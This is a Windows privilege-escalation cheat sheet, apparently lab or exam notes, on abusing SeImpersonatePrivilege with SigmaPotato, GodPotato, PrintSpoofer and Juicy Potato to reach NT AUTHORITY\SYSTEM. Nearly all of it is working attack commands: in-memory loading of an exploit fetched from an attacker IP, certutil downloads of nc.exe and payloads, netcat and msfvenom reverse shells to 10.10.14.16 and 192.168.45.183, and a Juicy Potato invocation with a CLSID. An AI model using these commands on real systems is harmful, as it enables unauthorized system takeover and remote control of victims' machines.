Quick win
Any users with impersonate privileges to NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM- User privileges and potato exploit
>whoami /priv
# Find SeImpersonatePrivilege
# Use SigmaPoato - Improved God potato
# https://github.com/tylerdotrar/SigmaPotato
# In memory attack. Find other attacks at github site
Kali> rlwrap nc -nlvp 1236
CMD> powershell
PS> [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://10.10.14.16/privesc/SigmaPotato.exe"))
[SigmaPotato]::Main(@("--revshell","10.10.14.16","1236"))
# Use God potato to rule them all as of 8/27/2023
# https://github.com/BeichenDream/GodPotato
CMD> certutil -urlcache -split -f http://10.10.14.16/nc.exe
Kali> rlwrap nc -nlvp 1235
CMD> GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"
# Printspoofer
# https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
CMD> .\PrintSpoofer64.exe -i -c cmd
# Use Local Potato to rule them all - Local Potato or Sweet Potato as pf 12/22/2022
# If you do not want to use Local Potato or Sweet Potato:
# If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
# If the machine is < Windows 10 1809(or 1803) < Windows Server 2019 and/or only x86- Try Juicy Potato
# https://github.com/ivanitlearning/Juicy-Potato-x86
Kali> msfvenom -p windows/shell_reverse_tcp lhost=192.168.45.183 lport=443 -f exe -o shell.exe
CMD> certutil -urlcache -split -f http://192.168.45.183/j.exe # Juicy Potato
CMD> certutil -urlcache -split -f http://192.168.45.183/shell.exe # reverse shell
Kali> rlwrap nc -nlvp 443
CMD> j.exe -l 443 -p C:\wamp\bin\apache\Apache2.2.21\shell.exe -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
Normal User to Local Administrator or More Privileges
- Add Ourselves to the group - Normal Users to Local Administrator
- RunasCS - Local Administrator with having more privileges (as well as logon as a different user)
Local Administrator to System
Last updated